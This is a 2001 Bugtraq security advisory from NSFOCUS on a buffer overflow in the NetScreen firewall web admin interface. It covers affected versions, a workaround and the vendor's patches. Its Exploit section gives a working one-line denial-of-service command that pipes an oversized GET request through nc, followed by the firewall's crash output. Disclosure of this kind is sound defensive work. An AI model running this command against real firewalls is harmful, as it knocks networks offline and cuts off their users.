From security@NSFOCUS.COM Wed Jan 10 06:40:11 2001 From: Nsfocus Security Team To: BUGTRAQ@SECURITYFOCUS.COM Date: Tue, 9 Jan 2001 12:55:36 +0800 Subject: [BUGTRAQ] NSFOCUS SA2001-01: NetScreen Firewall WebUI Buffer Overflow vulnerability NSFOCUS Security Advisory(SA2001-01) Topic: NetScreen Firewall WebUI Buffer Overflow vulnerability Release Date£º Jan 9th, 2001 CVE Candidate Numbers: CAN-2001-0007 Affected system: ================ ScreenOS release 1.73r1 on the NetScreen-1000 ScreenOS release 2.01r6 on the NetScreen-10/100 ScreenOS release 2.10r3 on the NetScreen-5 ScreenOS release 2.5r1 on the NetScreen-5/10/100 Non-affected system£º ==================== ScreenOS release 1.73r2 on the NetScreen-1000 ScreenOS release 2.01r7 on the NetScreen-10/100 ScreenOS release 2.10r4 on the NetScreen-5 ScreenOS release 2.5r2 on the NetScreen-5/10/100 Impact: ========= NSFOCUS security team has found a buffer overflow vulnerability in NetScreen Firewall WebUI. Exploitation of this vulnerability, malicious user can launch remote DoS attack to crash the firewall. Description£º ============ NetScreen Firewall is a popular commercial firewall. It has a Web administration interface (default listening at port 80) that allows firewall administrator to configure firewall with browser. However, it is lack of length check-up of input URL. Provided with a oversized URL request, a buffer overflow may take place that will crash the NetScreen firewall. In that case, all connections through firewall will be dropped, and the firewall won't response to any connection request. Rebooting the firewall is required to regain its functions. Attackers can launch attack without logining firewall. All current versions of ScreeOS, including 1.73r1, 2.0r6, 2.1r3 and 2.5r1 are affected by this vulnerability on occasion that WebUI has been enabled . Exploit: ========== Once the input URL is longer than 1220 bytes£¬NetScreen firewall will crash: $echo -e "GET /`perl -e 'print "A"x1220'` HTTP/1.0\n\n"|nc netscreen_firewall 80 Following information will appear on firewall console£º ****************************** EXCEPTION ****************************** Bus error execption (data reference: load or store) EPC = 0x8009AA1C, SR = 0x34501007, Cause = 0x0080001C Firewall halts now. Workaround: =================== Disable WebUI management or appoint trusted administration host before acquirement and installation of relevant patch. Vendor Status: ============== We have notified NetScreen of this vulnerability on 12/19/2000 . On 12/26/2000 NetScreen has issued following ScreenOS release versions to fix the bug: ScreenOS 1.73r2 on the NetScreen-1000 ScreenOS 2.10r4 on the NetScreen-5 ScreenOS 2.01r7 on the NetScreen-10/100 ScreenOS 2.5.0r2 on the NetScreen-5/10/100 Latest software are available at: http://www.netscreen.com/support/updates.html You can also contact NetScreen Technical Support Center (mailto:support@netscreen.com) for upgraded software. Additional Information: ======================== The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2001-0007 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. Candidates may change significantly before they become official CVE entries. DISCLAIMS: ========== THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENTSHALL NSFOCUS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. DISTRIBUTION OR REPRODUTION OF THE INFORMATION IS PROVIDED THAT THE ADVISORY IS NOT MODIFIED IN ANY WAY. ?Copyright 1999-2000 NSFOCUS. All Rights Reserved. Terms of use. NSFOCUS Security Team NSFOCUS INFORMATION TECHNOLOGY CO.,LTD (http://www.nsfocus.com)